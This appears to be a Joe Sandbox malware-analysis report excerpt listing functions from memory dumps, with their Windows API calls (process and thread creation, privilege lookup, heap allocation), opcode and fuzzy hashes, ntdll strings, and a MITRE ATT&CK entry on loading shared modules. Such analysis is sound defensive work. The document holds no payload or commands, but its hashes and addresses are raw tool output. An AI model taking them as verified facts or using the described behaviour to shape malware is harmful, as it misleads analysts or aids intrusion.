Instruction ID: d260b29350d74fde9baecb5621f4411eae01c111e61e271ba01b6ec6d2c3ab81
Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
Instruction Fuzzy Hash: C60171B5D4020DABDF10EBE4DC46FDDB3789B54308F008199EA1997241F630EB04CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00CDA6CD Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00CDA724

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 49673564f135c90bb8b14e738da416f71c0e8c82d151334560f40df9ccec30d8
Instruction ID: 9d59e6214297e393d29e34593a61ecb6ea118e89c5ca3a923123bc98f721588e
Opcode Fuzzy Hash: 49673564f135c90bb8b14e738da416f71c0e8c82d151334560f40df9ccec30d8
Instruction Fuzzy Hash: C601AFB2200108AFCB54DF89DD80EEB37AAAF8C354F158258BA0DA7245C630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CDA6D0 Relevance: 1.5, APIs: 1, Instructions: 42
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00CDA724

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 05ca98d30ec04a8d50c5ebdc82b97b742a9b4d49ab8345fc5af9f678139737d3
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: DC01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97245C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00CD9193 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00CCF040,?,?,00000000), ref: 00CD91DC

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 446e2ecf9122d0f7dfe25717fc09f93fc63159a25199d11cb1a8034d43c451e7
Instruction ID: 7e6369951550fbf1c52fde5db4463790c4922b9e2b9d5210ca8fbd48e0ffb0fa
Opcode Fuzzy Hash: 446e2ecf9122d0f7dfe25717fc09f93fc63159a25199d11cb1a8034d43c451e7
Instruction Fuzzy Hash: CCF0E5333907007BE2309558DC02FE773A9DB95B20F14062AFB5AAB3C1C5A0F9028394

Uniqueness

Uniqueness Score: -1.00%

Function 00CD91A0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00CCF040,?,?,00000000), ref: 00CD91DC

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 0c5ca6d4c7e301a8f587fc596a1b38b8420365de227eb8d3e274ef6237d30cb9
Instruction ID: 2c5eac280266fcf2696b80d4b0eb599774a547be1c0895404e13c4b451270a1e
Opcode Fuzzy Hash: 0c5ca6d4c7e301a8f587fc596a1b38b8420365de227eb8d3e274ef6237d30cb9
Instruction Fuzzy Hash: 6BE06D373902043AE2206599AC02FABB39CDB81B20F14002AFB0DEB2C1D5A5F90142A4

Uniqueness

Uniqueness Score: -1.00%

Function 00CDA7B1 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00CCF1C2,00CCF1C2,?,00000000,?,?), ref: 00CDA7F0

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 241c6876de0d2fb54df3d9ebd809ee83839c242943400ba01432ee89a7cf7ec2
Instruction ID: 2dc92c6eaa16842dcbf7c168c1e6f5eb10c34fa35b4518c1ba0babc96884b39d
Opcode Fuzzy Hash: 241c6876de0d2fb54df3d9ebd809ee83839c242943400ba01432ee89a7cf7ec2
Instruction Fuzzy Hash: 42E09AB2604211AFD720EBA8EC818EBB32DEF803603218897FD4887305C231D92187B2

Uniqueness

Uniqueness Score: -1.00%

Function 00CCF6B7 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00CC8D14,?), ref: 00CCF6EB

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 95637b26446661256d3d0f3c8f728e9efcf6e6276877b12f77c158bcf098a03d
Instruction ID: 370976f6eb73e00052a7a8d83761a0fcf62eb240f901562406df9d02b34f5152
Opcode Fuzzy Hash: 95637b26446661256d3d0f3c8f728e9efcf6e6276877b12f77c158bcf098a03d
Instruction Fuzzy Hash: C4E072B12A83023BE314BAB0EE03F072B04AB00740F04007CE208EB1D3C808C011013A

Uniqueness

Uniqueness Score: -1.00%

Function 00CDA620 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00CD4526,?,00CD4C9F,00CD4C9F,?,00CD4526,?,?,?,?,?,00000000,00000000,?), ref: 00CDA64D

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: dd6b81a5eb23f257384fff287c3814dd082cff31690ea47ffd16edb3a11dcefb
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: A8E012B1200208ABDB14EF99CC41EA777ACEF88654F118599BA1C5B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 00CDA7C0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,00CCF1C2,00CCF1C2,?,00000000,?,?), ref: 00CDA7F0

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: af947ddaf9e87ea720e98591cc4559266ba0d71684be497663153d3b0b6b7390
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 92E01AB12002086BDB10DF89CC85EE737ADEF88650F018155BA0C57241C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00CCF6C0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,00CC8D14,?), ref: 00CCF6EB

Memory Dump Source

Source File: 00000008.00000002.4099081884.0000000000CC0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_cc0000_control.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction ID: 32b889c6635009b5215b50afcc8ba2609ad773a7f53e69948264d01337bb0649
Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
Instruction Fuzzy Hash: 63D052626903083BEA10BAA8DC03F267389AB44B00F490078FA48AB3C3E964E5018165

Uniqueness

Uniqueness Score: -1.00%

Function 04E82C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04E82C24

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 25c70e8e9b9ea6a29f75033cf777a239f688f4a8b7847e4a9cc5520567e08795
Instruction ID: 1fb16b0ab076ddb8d9461d1205edb047a39be2b2ee4452fe808e470ebe807dd3
Opcode Fuzzy Hash: 25c70e8e9b9ea6a29f75033cf777a239f688f4a8b7847e4a9cc5520567e08795
Instruction Fuzzy Hash: 33B02B318014C0C5FF00F720060871739007BD0304F15C0A1D3070246E0338D0C0F175

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04E82890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04E8293C
___swprintf_l.LIBCMT ref: 04E8295E
___swprintf_l.LIBCMT ref: 04E829A3
___swprintf_l.LIBCMT ref: 04EBA52E

Strings

ffff:, xrefs: 04EBA504
::ffff:0:%u.%u.%u.%u, xrefs: 04EBA54E
::%hs%u.%u.%u.%u, xrefs: 04EBA527
:%u.%u.%u.%u, xrefs: 04EBA5B8

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: b357d5c267d28ddff5877a875956177a93e939d816cc543588d581ba96b12afc
Instruction ID: 1109fcf6d7eb2a6aa7acab426d9317652054b8fe001ad150059664022c738bb9
Opcode Fuzzy Hash: b357d5c267d28ddff5877a875956177a93e939d816cc543588d581ba96b12afc
Instruction Fuzzy Hash: 2651B7B5A00116BFDF11EF9888909BEF7B8BB48204754916DE5ADD7641E234FE508BE0

Uniqueness

Uniqueness Score: -1.00%

Function 04EF2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04EF24A6
___swprintf_l.LIBCMT ref: 04EF24E2
___swprintf_l.LIBCMT ref: 04EF257D
___swprintf_l.LIBCMT ref: 04EF25A3
___swprintf_l.LIBCMT ref: 04EF25C8
___swprintf_l.LIBCMT ref: 04EF2608

Strings

ffff:, xrefs: 04EF247D, 04EF249D
::ffff:0:%u.%u.%u.%u, xrefs: 04EF24DA
:%u.%u.%u.%u, xrefs: 04EF25FF
::%hs%u.%u.%u.%u, xrefs: 04EF249E

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: db9ba431926d68a58ef4806e60c206e430364152f6ed3c33117d76be1f3780c1
Instruction ID: 1c2304e77ddaa39e364e6d4efccdd3d3c4955071fd4b7c2346029e88b8dae9e2
Opcode Fuzzy Hash: db9ba431926d68a58ef4806e60c206e430364152f6ed3c33117d76be1f3780c1
Instruction Fuzzy Hash: 5551F175A00645ABDB30DF9CCC9087FB7F9AB44208B409899E796D7681E7B5FA00CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04E77630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

ExecuteOptions, xrefs: 04EB46A0
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04EB4655
CLIENT(ntdll): Processing section info %ws..., xrefs: 04EB4787
Execute=1, xrefs: 04EB4713
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04EB4725
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04EB46FC
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04EB4742

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 3b9296e581b27ade63773c871ceb63254fce66aff757f13c25f137e776d8b02a
Instruction ID: 79a1966f57d79eb8266eed9f0de6be4c3f49b603af99cdb8ffb513d8fc9c1d31
Opcode Fuzzy Hash: 3b9296e581b27ade63773c871ceb63254fce66aff757f13c25f137e776d8b02a
Instruction Fuzzy Hash: 75510831600219BAEF14ABA4ED85FEA73A9EF04319F0418E9D509A71C1E771BE41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04F16940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction ID: 32b9dbf9580c66bf8f45e95889050f15bb13850a76093bd70c47d1bc58e5a6df
Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
Instruction Fuzzy Hash: 59020671508341AFE705DF28C890E6FB7E5EFC8704F148A2DB9899B264DB31E906CB52

Uniqueness

Uniqueness Score: -1.00%

Function 04E8B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 04E8B6BF

Strings

0, xrefs: 04E8B695
+, xrefs: 04E8B65A
0, xrefs: 04E8B66F
-, xrefs: 04E8B650

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction ID: d84b1a3d4909668135c0cc43ff4bb63efe55686eecbb4f970c98217f4e61e618
Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
Instruction Fuzzy Hash: FA81D030E452499EDF24AF68C8907FEBBB2AF45314F18661DF86DA7290D735B8408B50

Uniqueness

Uniqueness Score: -1.00%

Function 04EF20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04EF214F
___swprintf_l.LIBCMT ref: 04EF2172

Strings

[, xrefs: 04EF212B
%%%u, xrefs: 04EF2146
]:%u, xrefs: 04EF2169

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$[$]:%u
API String ID: 48624451-2819853543
Opcode ID: 92f5b803273feeee380897719ebf9d086ac6191a95fd90710cf2d54dcf5db530
Instruction ID: 761f7f608eed9261d7b8bbb45a8ec5325ac2c5980dea4725f50ad6387c3752f1
Opcode Fuzzy Hash: 92f5b803273feeee380897719ebf9d086ac6191a95fd90710cf2d54dcf5db530
Instruction Fuzzy Hash: 74215176A00119ABDB10DFB9DC40AEFB7E8EF54748F44125AEA09E3240F731E9018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 04E6F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04EB02E7
RTL: Re-Waiting, xrefs: 04EB031E
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04EB02BD

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 05e61052316f1309bd3b1b51020fef2d0a22cfcdef9b79705970395344fed500
Instruction ID: 8bd88ff4651a7f14ee9dca74c1e02693a11e0f0146c1326af18f2dab73f6ea00
Opcode Fuzzy Hash: 05e61052316f1309bd3b1b51020fef2d0a22cfcdef9b79705970395344fed500
Instruction Fuzzy Hash: A7E1BF306447419FD724CF28D884B6BB7E0BF88358F142A5DE5A68B2E1E774F945CB82

Uniqueness

Uniqueness Score: -1.00%

Function 04E7BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON

Download Yara Rule

Strings

RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04EB7B7F
RTL: Resource at %p, xrefs: 04EB7B8E
RTL: Re-Waiting, xrefs: 04EB7BAC

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID:
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 0-871070163
Opcode ID: 79e44c936e4272bea0213c6e00fe37af16778c83584c30e308917f575be340a5
Instruction ID: 71f9e7ecdf8f5051d4837b6093343ffd5be479832aca2e3ac1d1e3b011422ba4
Opcode Fuzzy Hash: 79e44c936e4272bea0213c6e00fe37af16778c83584c30e308917f575be340a5
Instruction Fuzzy Hash: B141BF313047029FD728DE258D40B6AB7E6EF88B28F001A1DE89ADB680DB31F5058B91

Uniqueness

Uniqueness Score: -1.00%

Function 04E7B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04EB728C

Strings

RTL: Resource at %p, xrefs: 04EB72A3
RTL: Re-Waiting, xrefs: 04EB72C1
RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04EB7294

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-605551621
Opcode ID: 13effc7c950c6454ee763e44dbb07f2c377d8b969778dce0f5f7503275cdbf0c
Instruction ID: 3e527172758be96c3dcda5d683e6ed67d739031c42fc60825731a535047b81cd
Opcode Fuzzy Hash: 13effc7c950c6454ee763e44dbb07f2c377d8b969778dce0f5f7503275cdbf0c
Instruction Fuzzy Hash: B241E271740206AFDB24DF25CC41BA6B7A5FF84728F142619F995EB680EB31F8428BD1

Uniqueness

Uniqueness Score: -1.00%

Function 04EF2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 04EF238D
___swprintf_l.LIBCMT ref: 04EF23B3

Strings

%%%u, xrefs: 04EF2384
]:%u, xrefs: 04EF23AA

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: ___swprintf_l
String ID: %%%u$]:%u
API String ID: 48624451-3050659472
Opcode ID: ffe1b4d9fab703794a48b58f8368b43c6194bd96a11983b3b6ef82c233be0d3a
Instruction ID: 2fbdcd6eeae9576d23c8fbba492e6f4b7f88775632554baee4fbcb338ecd543b
Opcode Fuzzy Hash: ffe1b4d9fab703794a48b58f8368b43c6194bd96a11983b3b6ef82c233be0d3a
Instruction Fuzzy Hash: FD318472A016199FDB60DF28DC40BFE77F8EB44714F841595EA49E3240EB31FA448BA1

Uniqueness

Uniqueness Score: -1.00%

Function 04E87D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 04E87E8B

Strings

-, xrefs: 04E87DDD
+, xrefs: 04E87DE8

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-
API String ID: 1302938615-2137968064
Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction ID: d9159b14bd9ea775ad1b75cad05b73ef17e997fe92cc40a36177212e5058180e
Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
Instruction Fuzzy Hash: 6E919271E002159AEF24FF6ACC806BEB7A5BF45368F64651EE85DA72C1E730A940C720

Uniqueness

Uniqueness Score: -1.00%

Function 04E49126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 04E49175
$, xrefs: 04E49191

Memory Dump Source

Source File: 00000008.00000002.4099951797.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: true

Associated: 00000008.00000002.4099951797.0000000004F39000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004F3D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.4099951797.0000000004FAE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e10000_control.jbxd

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: b4ded90a1fa312a5f3f115ead46b24fd1b9f97d8b66d0f243fe804ebd6b1b9a7
Instruction ID: 6e96856febf769eb1894904532a06e8e63a0e497283286a7062b439ee9bab5e2
Opcode Fuzzy Hash: b4ded90a1fa312a5f3f115ead46b24fd1b9f97d8b66d0f243fe804ebd6b1b9a7
Instruction Fuzzy Hash: BA812DB1D002699BDB35DF54DC44BEEB7B4AB48754F0452EAAA09B7240E7706E84CFA0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

